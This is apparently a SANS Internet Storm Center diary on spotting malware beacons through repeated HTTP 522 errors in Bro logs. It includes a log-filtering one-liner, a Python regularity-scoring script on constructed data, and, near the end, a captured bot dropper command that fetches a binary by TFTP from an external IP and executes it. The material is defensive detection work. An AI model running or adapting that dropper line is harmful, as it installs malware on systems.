from SANS Internet Storm Center, InfoCON: green
Recently I ran across a tweet from Packet Watcher @jinq102030 (https://twitter.com/jinq102030/status/756476442590842880) suggesting that you keep an eye on HTTP error code 522 for possible malware check-ins. A 522 code could mean several things, but from an IR perspective it can mean that a malicious host has been pulled offline and you have a client still trying to connect. So I got our intern to check the Bro logs and see what he could find.
>zcat http* | bro-cut ts id.orig_h id.resp_h host status_code | awk '$5 == "522"'
1467159441.247406 192.128.1.216 104.27.182.19 - 522
1467160356.407366 192.128.1.216 104.27.183.19 - 522
1467161271.647320 192.128.1.216 104.27.183.19 - 522
1467163102.087490 192.128.1.216 104.27.183.19 - 522
1467164017.337316 192.128.1.216 104.27.183.19 - 522
1467164932.547084 192.128.1.216 104.27.182.19 - 522
….
1467182323.201685 192.128.1.216 104.27.182.19 - 522
1467183238.447046 192.128.1.216 104.27.183.19 - 522
1467184153.641505 192.128.1.216 104.27.183.19 - 522
1467185068.903194 192.128.1.216 104.27.182.19 - 522
…
There was other traffic that turned out to be false positives, but you could easily tell that this IP was checking this site on a regular basis. Out of 4GB of compressed Bro logs for the day we only had about 200 total lines that matched, so a very low noise ratio.
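The zcat/bro-cut/awk one-liner above finds the 522 lines, but the thing that separated the real check-in from the false positives was the regular cadence (roughly every 915 seconds in the output above, with one missed beat). The script below is an added example, not the diary's or the intern's code: it parses a Bro/Zeek-style http.log (tab-separated, with the usual #fields header), keeps the 522 responses, groups them per client, and scores how regular the inter-arrival gaps are so that a single stray 522 does not fire. The log text is constructed; the 192.128.1.216 rows reuse the timestamps and addresses printed above, and the other clients and the example.test host are made-up filler for the false-positive case.

```python
import io
import statistics
from collections import defaultdict

# Constructed sample in Bro/Zeek http.log format (tab-separated, "#fields"
# header). The 192.128.1.216 rows mirror the diary's output; the other two
# clients are made-up noise so the filter has something to reject.
SAMPLE_HTTP_LOG = """#separator \\x09
#fields\tts\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\thost\tstatus_code
#types\ttime\taddr\tport\taddr\tport\tstring\tcount
1467159441.247406\t192.128.1.216\t49152\t104.27.182.19\t80\t-\t522
1467160356.407366\t192.128.1.216\t49153\t104.27.183.19\t80\t-\t522
1467161271.647320\t192.128.1.216\t49154\t104.27.183.19\t80\t-\t522
1467163102.087490\t192.128.1.216\t49155\t104.27.183.19\t80\t-\t522
1467164017.337316\t192.128.1.216\t49156\t104.27.183.19\t80\t-\t522
1467164932.547084\t192.128.1.216\t49157\t104.27.182.19\t80\t-\t522
1467160000.000000\t192.128.1.50\t50000\t203.0.113.10\t80\texample.test\t522
1467160100.000000\t192.128.1.50\t50001\t203.0.113.10\t80\texample.test\t200
1467162000.000000\t192.128.1.77\t50002\t198.51.100.5\t80\t-\t522
#close\t2016-06-29-23-59-59
"""


def parse_bro_log(text):
    """Yield one dict per record, keyed by the column names in the #fields line."""
    fields = None
    for line in io.StringIO(text):
        line = line.rstrip("\n")
        if not line:
            continue
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
            continue
        if line.startswith("#"):          # #separator, #types, #close, ...
            continue
        if fields is None:
            raise ValueError("data record seen before the #fields header")
        yield dict(zip(fields, line.split("\t")))


def find_522_checkins(text, min_hits=3, tolerance=0.1):
    """Summarise clients that received HTTP 522 at least min_hits times.

    For each such client we record the hit count, the set of responder IPs
    (the diary's host alternated between two CDN addresses, so grouping by
    responder alone would split the beacon), the median gap between hits,
    and a 'regularity' score: the fraction of gaps that are within
    `tolerance` of a whole multiple of the median gap. A missed check-in
    shows up as a gap of ~2x the median and still counts as regular.
    """
    by_client = defaultdict(list)
    for rec in parse_bro_log(text):
        if rec.get("status_code") == "522":
            by_client[rec["id.orig_h"]].append((float(rec["ts"]), rec["id.resp_h"]))

    results = {}
    for client, hits in by_client.items():
        if len(hits) < min_hits:           # one-off 522s are not a beacon
            continue
        hits.sort()
        times = [t for t, _ in hits]
        gaps = [b - a for a, b in zip(times, times[1:])]
        median_gap = statistics.median(gaps)
        regular = 0
        for g in gaps:
            ratio = g / median_gap
            if round(ratio) >= 1 and abs(ratio - round(ratio)) < tolerance:
                regular += 1
        results[client] = {
            "hits": len(hits),
            "dests": sorted({d for _, d in hits}),
            "median_gap": median_gap,
            "regularity": regular / len(gaps),
        }
    return results


if __name__ == "__main__":
    for client, info in find_522_checkins(SAMPLE_HTTP_LOG).items():
        print(client, info)
```

Run it against a real day of logs by feeding the decompressed http.log text instead of the constructed sample; a client with a high regularity score and a median gap in the minutes range is the one worth pulling the full packet capture for, as the diary does next.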
When looking at the full packet capture of the system in question, we were able to tell that it was compromised and had downloaded a bot:
cd /tmp || cd /var/ || cd /dev/;busybox tftp -r min -g 91.134.141.49;cp /bin/sh .;cat min >sh;chmod 777 sh;./sh.
This is certainly something we are going to keep looking at for finding more compromised systems.
--
Tom Webb
@twsecblog